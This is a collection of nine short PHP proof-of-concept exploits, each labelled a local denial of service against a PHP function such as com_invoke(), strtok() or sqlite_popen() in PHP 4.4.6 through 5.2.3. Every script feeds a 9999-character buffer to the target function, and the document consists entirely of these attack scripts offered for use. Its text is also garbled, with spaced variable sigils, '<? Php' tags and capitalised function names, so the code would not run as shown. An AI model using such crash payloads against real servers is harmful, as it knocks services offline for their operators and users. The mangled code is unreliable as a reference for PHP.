Com_invoke ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 4.4.6 com_invoke () Local Denial of Service
//
// Tested on win xp, Apache, PHP 4.4.6. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buffer = str_repeat ("A", 9999 );
Com_invoke ($ buffer, 1 );
?>
Com_propput ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 4.4.6 com_propput () Local Denial of Service
//
// Tested on win xp, Apache, PHP 4.4.6. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buffer = str_repeat ("A", 9999 );
Com_propput (1, 1, $ buffer );
?>
Com_propset ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 4.4.6 com_propset () Local Denial of Service
//
// Tested on win xp, Apache, PHP 4.4.6. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buffer = str_repeat ("A", 9999 );
Com_propset (1, 1, $ buffer );
?>
Iconv_mime_encode ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 5.0.3 iconv_mime_encode () Local Denial of Service
//
// Tested on win xp, Apache, PHP 5.0.3. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buff = str_repeat ("A", 9999 );
Iconv_mime_encode ($ buff, 1 );
?>
Imageftbbox ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 5.0.3 imageftbbox () Local Denial of Service
//
// Tested on win xp, Apache, PHP 5.0.3. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buff = str_repeat ("A", 9999 );
Imageftbbox (1, 1, $ buff, 1 );
?>
Com_set ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 4.4.6 com_set () Local Denial of Service
//
// Tested on win xp, Apache, PHP 4.4.6. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buffer = str_repeat ("A", 9999 );
Com_set (1, 1, $ buffer );
?>
Strtok ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 5.2.3 strtok () Local Denial of Service
//
// Tested on win xp, Apache, PHP 5.2.3. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buff = str_repeat ("A", 9999 );
Strtok ($ buff );
?>
Sqlite_popen ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 5.0.3 sqlite_popen () Local Denial of Service
//
// Tested on win xp, Apache, PHP 5.0.3. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buff = str_repeat ("A", 9999 );
Sqlite_popen ($ buff );
?>
Imagettfbbox ()
<? Php
// ================================================ ========================================================== ====
//
// PHP 5.0.3 imagettfbbox () Local Denial of Service
//
// Tested on win xp, Apache, PHP 5.0.3. Local Denial of Service.
//
// Local Denial of Service
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com <mailto: pr0t3ct10n@gmail.com>
// Http://www.nullbyte.org.il
//
// ================================================ ========================================================== ====
$ Buff = str_repeat ("A", 9999 );
Imagettfbbox (1, 1, $ buff, 1 );
?>